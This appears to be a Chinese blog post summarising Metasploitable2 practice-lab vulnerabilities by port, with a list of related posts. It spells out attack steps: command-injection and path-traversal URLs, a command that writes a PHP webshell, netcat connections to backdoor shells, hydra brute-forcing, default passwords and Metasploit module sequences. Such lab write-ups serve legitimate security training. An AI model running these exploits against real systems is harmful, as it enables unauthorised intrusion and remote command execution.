metasploitable2靶场漏洞总结(部分)

原创 已于 2024-10-14 14:59:44 修改 · 3.9k 阅读 · 22 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #php #ssh #metasploitable #安全

于 2022-08-17 19:45:26 首次发布

metasploitable2

端口

使用nmap扫描可得:
在这里插入图片描述

21vsftpd2.3.4笑脸后门漏洞

程序的后门代码绑定的侦听端口是 6200。
通过ftp进行连接 在账号后加上:),密码随意,这时会登录失败,再次扫描6200端口,会发现6200端口已经打开,最后用nc连接6200端口就能执行命令了。也可以使用msf搜索vsftpd,利用msf里的脚本攻击。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

22弱口令

hydra -L logins.txt -P pws.txt -M targets.txt ssh 或者 使用msf里的ssh_enumusers 来爆破(msfadmin/msfadmin)。

23弱口令

msfadmin/msfadmin

25 CNNVD-200111-004

低危,产生超多SMTP错误导致服务拒绝(内存耗尽)。

53 ISC BIND

80 http

  1. twiki漏洞
    twiki版本为 01
    http://192.168.230.130/twiki/bin/view/Main/TWikiUsers?rev=2%20|whoami||echo
    在这里插入图片描述
    当twiki版本为4.0.x时,存在任意文件读取
    http://example.com/bin/viewfile/TWiki/TWikiDocGraphics?rev=1;filename=…/…/…/…/…/etc/passwd
  2. phpmyadmin漏洞
    版本:3.1.1
    爆破目录
    在这里插入图片描述
    扫到setup文件,
    登录界面重放操作
    修改url为
/phpmyadmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input

表示修改配置文件中的参数all_url_include(打开引用文件功能)和auto_prepend_file(附加文件)
passthru为执行命令
可以使用echo “<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>” > /var/www/cmd.php 命令来添加shell
反弹shell操作
在这里插入图片描述

  1. cgi参数注入
    server API 是CGI方式运行的,这个方式在PHP存在漏洞-Cgi参数注入
    use exploit/multi/http/php_cgi_arg_injection
  2. webdav
    https://blog.youkuaiyun.com/qq_41861526/article/details/103414741

111 rpcbind

use auxiliary/scanner/misc/sunrpc_portmapper
search sunrpc
在这里插入图片描述

139/445 smb

use exploit/multi/samba/usermap_script
最后smbclient -L //192.168.206.216获取共享目录
search smb (大部分为远程执行漏洞)
可能存在共享弱口令:netbios-ssn://192.168.230.130 (及使用IPC$连接,尝试连接未成功
用户名/密码:User/User

512 rexec(远程计算机上运行命令)爆破

hydra爆破

1099 java-rmi

CVE-2011-3556:
use exploit/multi/misc/java_rmi_server
set payload java/meterpreter/reverse_tcp
set RHOSTS xxx
run
在这里插入图片描述
CVE-2017-3241 rmi反序列化漏洞
存在有缺陷的第三方库如commons-collections(主要缺陷为第三方库)

1524 bind_shell

metasploitable2本身有shell,可以直接连接
nc 192.168.230.130 1524

2049 nfs

nfs有信息泄露漏洞

showmount -e 192.168.230.130 2049

但是靶场好像没有

2121 ftp

  1. 超级弱口令扫描出来存在弱口令
    在这里插入图片描述
  2. vsftpd后门漏洞
    search vsftpd
    use exploit/unix/ftp/vsftpd_234_backdoor

3306 mysql

用户名root 密码为空

3632 distccd

use exploit/unix/misc/distcc_exec
show payloads
 set payload cmd/unix/bind_perl
run

在这里插入图片描述

5432 postgresql

爆破

5900 vnc

爆破,密码为password

6667/6697 irc

search rcd
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
set rhosts 192.168.206.216
run

8009 ajp

poc下载:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

8180 tomcat示例漏洞

当tomcat默认页面manager/html需要输入账号和密码时,metasploit 中有扫描器tomcat_mgr_login获取账号密码。用账号密码登录后,有上传war(压缩包rar改名为war)的地方,上传成功后,在url根目录添加上war包名/压缩包里的文件?cmd=whoami
在这里插入图片描述
也可以使用jar -cvf xx.war xx.jsp 生成war包,上传后访问 http://127.0.0.1:8080/war 包名(无后缀) / 包名内文件名
在这里插入图片描述

8787 drb

search drb
use use exploit/linux/misc/drb_remote_codeexec
set rhosts 192.168.206.216
run

Metasploitable2 靶机详细漏洞介绍及通关
vilice的博客
09-06 5865
漏洞产生的原因:在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。漏洞产生原因:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。漏洞产生的原因:通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。
Metasploit 内网渗透二—— 实战渗透操作--感受渗透流程,具体做什么 -永恒之蓝漏洞
天下著书立传者,皆为我师
04-24 3374
渗透测试实战练习1——永恒之蓝漏洞(渗透攻击 Win7 主机并远程执行命令)以及mysql空密码扫描利用(获取mysql数据库中信息)
Metasploit靶机漏洞实践检验
Birldlee的博客
12-27 1万+
使用Metasploit渗透测试软件对Metasploitable靶机系统主机进行攻击,检验各种常见靶机漏洞的情况。
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
零成本实战:用 Metasploitable2 练渗透,转行面试能演示
资深程序员,曾自学JAVA,C#,如今从业于网安行业
11-04 863
摘要:本文介绍如何利用免费漏洞靶机Metasploitable2进行渗透测试实战演练,帮助转行人员快速掌握面试必备技能。该靶场预置15+常见漏洞,配合Kali Linux攻击机,可实现零成本实战环境搭建。文章详细演示了三种高频渗透案例:MS08-067系统漏洞利用、SSH暴力破解和VNC未授权访问,提供完整操作命令和截图,确保学习者能一步一步重现渗透全流程。这些案例覆盖信息收集、漏洞利用、获取权限等关键环节,特别适合面试时现场演示,比单纯理论陈述更具说服力。
Metasploitable2 靶机漏洞(下)
Fly_鹏程万里
05-02 5159
11、Root用户弱口令漏洞SSH爆破) 安全组织索引 CVE:无 OSVDB:无 BID:无 原理 靶机root用户存在弱口令漏洞,在使用指南里并没有指出。 影响系统/软件 Linux 使用工具 Metasploit 利用步骤 1.输入nmap –sV -O 192.168.160.131 查看SSh端口是否开启 开启metasploit framework 框...
Metasploitable2 靶机漏洞(上)
Fly_鹏程万里
05-02 8142
此次演示环境 1、靶机: Metasploitable2-Linux IP:192.168.160.131 2、攻击演示系统 Kali Linux 1.0.9 一、弱密码漏洞(Weak Password) 安全组织索引 CVE: OSVDB: BID: 原理: 系统或者数据库的登录用户,密码简单或者用户名与密码相同,容易通过暴...
Metasploitable: 2靶场渗透
sucker的博客
06-10 999
渗透测试价值:Metasploitable 等靶机仍广泛用于教学,演示 从信息收集到提权 的完整链。此漏洞虽古老,但仍是理解后门漏洞原理的经典教材,实际环境中需确保无遗留 2.3.4 版本服务。4,分析目标系统的第一个暴露面,也是我们的攻击面,21端口存在的tp服务。漏洞本质:开发者故意植入或代码被篡改的后门,通过用户名中的特殊字符。后门漏洞 (CVE-2011-2523),允许未授权命令执行。6,尝试80端口的http服务漏洞利用getshell。Metasploit存在漏洞利用的模块,使用之。
metasploitable2靶场_超级超级详细的~
lmxstjghhh的博客
07-10 1915
Metasploitable2
OSCP备战—Metasploitable2 漏洞详细分析
2301_81864699的博客
05-05 1136
tcpwrapped 是 nmap 等工具在扫描端口时返回的一种状态标识,表明目标端口的 TCP 连接被某种机制(如防火墙、入侵检测系统或 TCP Wrappers)快速关闭,导致无法直接判断端口背后的服务类型。该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可达4GB),除非进程崩溃,或者管理员挂起/重启rpcbind服务,否则该内存不会被释放。bindshell 是典型的恶意服务,允许攻击者通过该端口直接获取系统控制权(如 root shell)。
Metasploitable2笑脸漏洞复现
WRplayeR的博客
12-11 738
vsftpd 2.3.4 的代码中存在几行与服务无关的代码,在检测到ftp登录的用户命中存在 :) 时会执行。再次使用ftp连接,退出后直接使用nc连接,使用whoami命令可以发现是root账户。打开6200端口,在该端口可以无需密码并且以管理员的身份进行登入。扫描,ftp打开且版本为vsftpd 2.3.4。ftp连接,并在用户名内输入包含 " :) "开启Metasploitable2靶机。192.168.232.131为靶机。再次扫描可以发现其6200端口打开,找到网段并进行网络存活主机扫描。
漏洞验证】Metasploitable2靶机漏洞复现
weixin_43486390的博客
12-10 3141
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Bind Shell Backdoor Detection4、UnrealIRCd Backdoor(ircd) Metasploitable2靶机漏洞复现 环境IP:192.16...
Metasploitable2靶机漏洞渗透测试
末班车的博客
03-11 2498
Metasploitable2靶机漏洞发现与渗透测试
靶机渗透()——metasploitable2
qq_45751902的博客
04-29 8914
目录一、简介二、信息收集三、端口渗透6667-irc21弱口令 一、简介 metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 靶机下载地址 用户名是 :msfadmin 密码是: msfadmin 二、信息收集 nmap -sS 192.168.92.0/24 开放了好多端口 三、端口渗透 启动msf msfconsole 6667-irc 登录msf search irc 找到对应得
Metasploitable2靶机之第七篇--Distcc后门漏洞
千寻的博客
04-02 2445
文章目录环境原理漏洞利用第一步 ,启动metasploit第二步选择漏洞库第三步 设置参数,开始攻击第四步 利用成功,执行验证摘抄 环境 主机 地址 Metasploitable2 192.168.232.202 kali-linux 192.168.232.129 原理 Distcc用于大量代码在网络服务器上的分布式编译, 但是如果配置不严格,容易被滥用执行命令, 该漏洞是XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制 漏洞利用 第一步
Metasploitable2中FTP漏洞
m0_56368726的博客
11-04 440
1、查看靶机的ip Metasploitable2默认的用户名是 :msfadmin 密码是: msfadmin 登陆之后使用ip addr查看ip地址 靶机的ip为192.168.43.253
metasploitable2靶场渗透
weixin_45349299的博客
02-13 634
title: metasploitable2靶场渗透 date: 2023-2-13 9 :16 :35 tags: vulhub categories: 渗透从入门到入土 author:Abyssaler
metasploitable3靶场渗透使用msf6实操(按照官方文档端口顺序(完整)
richardjung的专栏
01-22 3176
metasploitable3靶场使用msf6实操
看完这篇 教你玩转渗透测试靶机——Metasploitable2
热门推荐
Aluxian_的博客
03-09 3万+
Metasploitable2渗透测试详解Metasploitable2靶机介绍:Metasploitable2靶机下载:Metasploitable2靶机安装:Metasploitable2靶机漏洞详解: Metasploitable2靶机介绍: Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 Metasploita
搭建Metasploitable2靶场,并对其攻击提权获得root权限
最新发布
11-30
搭建Metasploitable2靶场并对其攻击提权获得root权限可按以下步骤进行: ### 搭建Metasploitable2靶场 1. **网络环境准备**:准备好合适的网络环境,例如使用虚拟机软件(如VMware或VirtualBox)搭建一个内部网络。确保Kali Linux和Metasploitable2能在同一网络中,且可以相互Ping通。Kali Linux的地址可设置为192.168.1.4,Metasploitable2的地址设置为192.168.1.5 [^3]。 2. **安装Kali Linux和Metasploitable2**:分别下载Kali Linux和Metasploitable2的镜像文件,然后使用虚拟机软件进行安装。安装完成后,按照上述地址配置网络信息。 ### 对Metasploitable2靶场进行攻击提权 1. **漏洞利用**:使用Metasploit Framework进行漏洞利用。打开Kali Linux的终端,输入以下命令: ```bash msfconsole ``` 在Metasploit控制台中,使用以下命令搜索可利用的漏洞: ```bash search samba 3.x ``` 选择合适的漏洞利用模块,例如: ```bash use exploit/multi/samba/usermap_script ``` 查看可用的有效负载: ```bash show payloads ``` 选择合适的有效负载,例如: ```bash set payload cmd/unix/reverse ``` 查看模块的配置选项: ```bash show options ``` 设置靶机的IP地址: ```bash set RHOSTS 192.168.1.5 ``` 运行漏洞利用程序: ```bash run ``` 2. **权限提升**:漏洞利用后,通常只有 “Web 服务权限”(比如 www-data 用户),无法操作服务器的核心文件 / 命令。权限提升就是 “从低权限用户提升到高权限用户(如 root)”,这是渗透测试的核心难点。可以使用Metasploitable3靶机Linux提权的相关方法进一步提升权限 [^1]。 ### 合规声明 本文技术内容及配套脚本仅用于合法靶场练手和个人学习,严禁用于未授权的网络攻击或恶意测试行为。任何违规使用导致的法律责任,均由使用者自行承担 [^2]。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值